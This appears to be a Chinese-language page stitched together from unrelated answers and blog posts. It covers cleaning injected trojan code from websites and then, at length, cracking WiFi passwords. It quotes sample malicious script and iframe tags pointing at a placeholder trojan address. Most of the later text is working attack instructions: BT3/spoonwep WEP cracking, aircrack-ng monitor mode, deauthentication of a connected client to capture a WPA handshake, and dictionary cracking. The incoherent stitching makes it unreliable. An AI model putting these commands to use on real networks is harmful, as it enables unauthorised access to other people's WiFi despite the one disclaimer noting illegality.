暴力破解

一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了网站挂马是每个网站最头痛的问题，解决办法：1.在程序中很容易找到挂马的代码，直接删除，或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的方法还是找专业做安全的来帮你解决掉听朋友说 SineSafe 不错 你可以去看看。清马+修补漏洞=彻底解决所谓的挂马，就是黑客通过各种手段，包括SQL注入，网站敏感文件扫描，服务器漏洞，网站程序0day, 等各种方法获得网站管理员账号，然后登陆网站后台，通过数据库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容，向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP，然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时，你就会自动的访问被转向的地址或者下载木马病毒清马1、找挂马的标签，比如有<script language="javascript" src="网马地址"></script>或<iframe width=420 height=330 frameborder=0scrolling=auto src=网马地址></iframe>，或者是你用360或病杀毒软件拦截了网马网址。SQL数据库被挂马，一般是JS挂马。2、找到了恶意代码后，接下来就是清马，如果是网页被挂马，可以用手动清，也可以用批量清，网页清马比较简单，这里就不详细讲，现在着重讲一下SQL数据库清马，用这一句语句“update 表名 set 字段名=replace(字段名,"aaa","")”， 解释一下这一句子的意思：把字段名里的内容包含aaa的替换成空，这样子就可以一个表一个表的批量删除网马。在你的网站程序或数据库没有备份情况下，可以实行以上两步骤进行清马，如果你的网站程序有备份的话，直接覆盖原来的文件即可。修补漏洞（修补网站漏洞也就是做一下网站安全。）1、修改网站后台的用户名和密码及后台的默认路径。2、更改数据库名,如果是ACCESS数据库，那文件的扩展名最好不要用mdb，改成ASP的，文件名也可以多几个特殊符号。3、接着检查一下网站有没有注入漏洞或跨站漏洞，如果有的话就相当打上防注入或防跨站补丁。4、检查一下网站的上传文件，常见了有欺骗上传漏洞，就对相应的代码进行过滤。5、尽可能不要暴露网站的后台地址，以免被社会工程学猜解出管理用户和密码。6、写入一些防挂马代码，让框架代码等挂马无效。7、禁用FSO权限也是一种比较绝的方法。8、修改网站部分文件夹的读写权限。9、如果你是自己的单独服务器，那就不仅要对你的网站程序做一下安全了，而且要对你的服务器做一下安全也是很有必要了！

是linux系统吗，可以用shell脚本完成脚本

所谓的暴力破解就是无穷循环，原理就是把每一种结果都组合起来，比如password是6位字符的，则采用6层循环，它是几何级增长的，所以采用暴力破解是很耗费时间的。实质上暴力破解返回的结果集就是笛卡儿积。

还是比较可靠的。包括安卓手机，苹果手机都有有效的破解WIFI的软件，，但是，介于手机和电脑的计算速度，和制作软件的人所采用的技巧，，，有关系。。。。安卓下最基础的就是万能钥匙，，这个是最垃圾，，但是确实有用的，，，还有畅无线，，，也是可以的，，但是连接的网络不同，，，安卓下的软件还有很多很多，，但是苹果下的软件多数是付费的，，除非你越狱，，，而且苹果软件多，，安卓下的也不少，，苹果的软件属于艺术品，安卓下的软件，，实用性很高，，，如你破解WEP,,大多数可以用BT3以上都可以轻松破解，，，如果是WPA2，可以使用奶瓶，，BT系列，小胖系统破解，，，当然也要花几十个小时破解WPS PIN码，，，只要路由器不冷门，，，除非它卡死，，，否则还没有破解不了的网络密码呢？！想要破解，不要着急，，，慢慢来，多尝试。。。成为高手，不是学几个小技巧就可以的，，，先多看看这方面的文章吧。。。

一、准备1、一个有可破解无线信号的环境。如我在家随便搜索出来的信号。2、带无线网卡的电脑一台（笔记本台式机均可，只要无线网卡兼容BT3），我用的是三星NC10的上网本。3、2G以上优盘一个（我用的是kingston 8G 的）4、下载BT3，约800多兆。下载地址 :网上自己百度去注：BT3 全称BackTrack3，与我们常说的bt下载是完全不同的概念。以我理解就是集成了一些计算机安全软件的linux系统。正是由于它的出世和不断普及，使得破解可让普通用户轻易言之。5、下载spoonwep2中文包。网上自己百度去注：spoonwep2就是我们的破解软件，一个非常强悍的图形化破解WEP无线网络密码的工具。二、安装1、将优盘格式化，配置如下图，唯一要注意文件系统选为FAT32就可以了。2、将刚才下载完成的bt3解压缩，复制到优盘，完成后会看到优盘目录下有两个文件夹，一个boot 一个BT3。3、开始安装bt3系统。点击开始-运行，输入CMD, 然后回车，进入命令行模式。首先输入你优盘的盘符，我这里是h盘，输入h：然后回车，接下来输入 cd boot 回车，进入到boot文件夹下。最后 bootinst.bat 回车，就会开始安装BT3然后安装会出现一个提示画面，我们别去管它，直接按任意键继续，按任意键后，电脑会自动设置引导记录，整个过程大概10秒左右。出现下面画面后，此优盘就可以引导系统进去bt3了。4、集成spoonwep2软件。首先把我们先前下载的spoonwep2解压缩，里面是六个扩展名为lzm的文件，将这六个文件复制到优盘t3modules文件夹下，这样我们的bt3系统已经集成安装完毕了，可以动手破解了。

Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件，主要功能有：网络侦测，数据包嗅探，WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支持监听模式的无线网卡上（设备列表请参阅其官方网站）并嗅探802.11a，802.11b，802.11g的数据。该程序可运行在Linux和Windows上。Linux版本已经被移植到了Zaurus和Maemo系统平台, 并概念验证可移植到iPhone。 使用Kali 2021.3进行演示操作 软件： aircrack-ng （Kali系统内置） 外置无线网卡设备： 要支持监听，支持Linux并且免驱（我这里使用的是RT3070） 命令： <code>sudo su</code> 解释： 不在管理员模式下运行可能会有权限不够的提示 命令： <code>iwconfig/ifconfig</code> 解释： iwconfig查看网卡的信息、ifconfig查看新连接的设备 wlan0就是我们的无线网卡 命令： <code>airmon-ng check kill</code> 解释： 杀死进程可以让搜索更准确，不会受到影响 命令： <code>airmon-ng</code> 出现你的网卡信息就说明你的网卡支持监听 命令： <code>airmon-ng start wlan0</code> 解释： start 开启哪个接口 wlan0 是接口的名字 再用iwconfig查看一下网卡信息，wlan0后面多了个mon，wlan0mon就说明已经开启监听了 命令： <code>airodump-ng wlan0mon</code> 解释： BSSID：WIFI的MAC地址、PWR：信号强度（值越小信号强度强）、Data：监听期间流量总合、CH：信道、ENC：加密算法、ESSID：WIFI名称 命令： <code>airodump-ng -c (频道号) --bssid (MAC地址) -w (抓取的数据包的保存位置) wlan0mon</code> 解释： 我要破解的目标网络是Test，CH（信道）是11，MAC地址是E2:D4:64:02:73:A8，我在根目录下创建了一个名为1的文件夹 输入命令： airodump-ng -c 11 --bssid E2:D4:64:02:73:A8 -w 1/ wlan0mon 当新的客户端连接时，客户端输入密码连接就可以抓到握手包，右上角出现WPA时就表示已经抓到了对方的握手包 命令： <code>aireplay-ng -o 2 -a BSSID（MAC地址） -c STATION wlan0mon</code> 解释： 执行命令<code>aireplay-ng -o 2 -a E2:D4:64:02:73:A8 -c C8:94:02:6D:93:F3 wlan0mon</code> 捕捉到握手包时就停止攻击 命令： <code>aircrack-ng -a2 -b E2:D4:64:02:73:A8 -w 字典.txt 1/-01.cap</code> 解释： 最后就是等待跑字典了，下面就是破解的WIFI密码 命令： <code>airmon-ng stop wlan0mon</code> 在监听模式下，kali不能连接网络 插入网卡，如果查看不到网卡信息，可以点开连接WIFI看一下能否搜索到附近的网络，如果不行那就右键系统可移动设备-把网卡断开再重新连接一下 插入网卡，打开网卡的监听模式，搜索附近的WIFI，获取握手包，最后跑字典破解握手包，这里给大家提供一个常用的密码字典

0.破解使用别人的密码是违法的，这里使用的是自己搭建的玩着玩，使用的也是弱密码。 1.首先需要一个支持监控模式的无线网卡，这里使用的是TP-LINK的TL-WN722N，淘宝很多随便买一个也行（tp-link tl-wn726n这个好像是免驱动，看淘宝销量比较多） 2.kali Linux 其实暴力破解最重要的就是字典。kali里面其实就内置了很多字典，但是说实话在国内不是很通用，毕竟是外国人的系统，字典也是按照外国人的习惯来的，在国内不是很通用，以后有机会我在弄一个国内通用的字典吧。。。。以后 = = 这里实验使用的弱密码也是够用的。拿kali的一个自带的字典rockyou，位于/usr/share/wordlists/rockyou.txt.gz 先解压： 查看可以用的无线网卡的名字： 开启无线网卡的监控模式： 有的在执行这个命令成功后网卡接口会变成wlan0mon，这里可以使用ifconfig查看。 ----我的就没有变不知道为什么，还是wlan0 扫描附近网络，发现目标： 我。。。我刚重做去截图又出现了，变名了。。 这几列都是需要用到的信息。 这里默认是一直不断的监听，获取到目标WiFi以后就可以Ctrl+C结束监听。 抓取握手包 可以看到这里目标网络是有一个终端正在连接使用，然后我们就是需要让他断开连接，在连接的时候我们就可以抓取到含有密码的握手包了。 这里如果在我们抓包的时候没有新终端加入进来进行连接的话我们是没办法抓到需要的握手包的。这时候我们就强制让他断开重连。 当出现WPA handshake就说明抓到握手包了。 进行密码破译： 这里一直在破着，破解的成功率和效率取决于你的字典。成功的话就会显示在红框里。

kali linux前身是BT5系统，作为渗透测试人员的标配装备，在这就不过多介绍了，接下来我们要使用kali linux完成抓取握手包，破解密码整个过程。 主要使用Aircrack套装软件 附： Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)